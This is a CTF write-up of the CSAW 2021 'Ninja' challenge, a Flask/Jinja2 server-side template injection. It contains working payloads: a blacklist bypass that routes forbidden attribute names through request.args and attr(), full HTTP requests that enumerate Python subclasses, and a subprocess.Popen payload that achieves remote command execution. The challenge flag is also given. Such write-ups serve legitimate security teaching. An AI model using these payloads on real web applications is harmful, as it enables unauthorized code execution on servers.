πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
πŸ‘¨πŸ’»
CTFs
HomePentestingLearn
Search…
🚩
Zeyu's CTF Writeups
Home
Pentesting
My Vulnerable Website
My Challenges
STANDCON CTF 2021
2021
Metasploit Community CTF
MetaCTF CyberGames
CyberSecurityRumble CTF
The InfoSecurity Challenge (TISC) 2021
SPbCTF's Student CTF Quals
Asian Cyber Security Challenge (ACSC) 2021
CSAW CTF Qualification Round 2021
Save the Tristate
securinotes
no pass needed
Gatekeeping
Ninja
YauzaCTF 2021
InCTF 2021
UIUCTF 2021
Google CTF 2021
TyphoonCon CTF 2021
DSTA BrainHack CDDC21
BCACTF 2.0
Zh3ro CTF V2
Pwn2Win CTF 2021
NorzhCTF 2021
DawgCTF 2021
UMDCTF 2021
Midnight Sun CTF 2021
picoCTF 2021
DSO-NUS CTF 2021
Powered By GitBook
Ninja
Flask Server-Side Template Injection (SSTI)

Description

Hey guys come check out this website I made to test my ninja-coding skills.
http://web.chal.csaw.io:5000

Solution

The webpage is vulnerable to a Server-Side Template Injection (SSTI) vulnerability.
However, there are a few restrictions. Using any of the blacklisted words will yield the following error:
Sorry, the following keywords/characters are not allowed :- _ ,config ,os, RUNCMD, base

Filter Bypass

I found this excellent tutorial on how to bypass Jinja2 SSTI filters. Basically, we can pass in any of the blacklisted characters as GET request arguments, then access them through request.args.
This allows us to pass them into attr(), which is a Jinja2 built-in filter that gets an attribute of an object. foo|attr("bar") is equivalent to foo.bar.
The following payload:
/submit?value={{()|attr(request.args.c)}}&c=__class__
will result in ().__class__ being evaluated and shown to the user.

Finding subprocess.Popen

To get the subclasses, we do ().__class__.__base__.__subclasses__().
1
GET /submit?value={{()|attr(request.args.c)|attr(request.args.b)|attr(request.args.s)()}}&c=__class__&b=__base__&s=__subclasses__ HTTP/1.1
2
Host: web.chal.csaw.io:5000
3
Upgrade-Insecure-Requests: 1
4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6
Referer: http://web.chal.csaw.io:5000/
7
Accept-Encoding: gzip, deflate
8
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
9
Connection: close
Copied!
I copied the output and used the following script to find <class 'subprocess.Popen'> in the subclasses. The index was 258.
1
check = "..."
2
for index,value in enumerate(check.split(',')):
3
if "subprocess.Popen" in value:
4
print(index)
Copied!
We are subsequently able to access this index to obtain RCE through subprocess.Popen.

RCE

With access to subprocess.Popen, we simply have to leverage it to achieve RCE.
1
GET /submit?value={{()|attr(request.args.c)|attr(request.args.b)|attr(request.args.s)()|attr(request.args.g)(258)('ls',shell=True,stdout=-1)|attr('communicate')()|attr(request.args.g)(0)|attr('decode')('utf-8')}}&c=__class__&b=__base__&s=__subclasses__&g=__getitem__ HTTP/1.1
2
Host: web.chal.csaw.io:5000
3
Upgrade-Insecure-Requests: 1
4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
6
Referer: http://web.chal.csaw.io:5000/
7
Accept-Encoding: gzip, deflate
8
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
9
Connection: close
Copied!
Finally, cat flag.txt gives us the flag!
The flag is flag{m0mmy_s33_1m_4_r34l_n1nj4}.
Previous
Gatekeeping
Next - 2021
YauzaCTF 2021
Last modified 2mo ago
Copy link
Contents
Description
Solution
Filter Bypass
Finding subprocess.Popen
RCE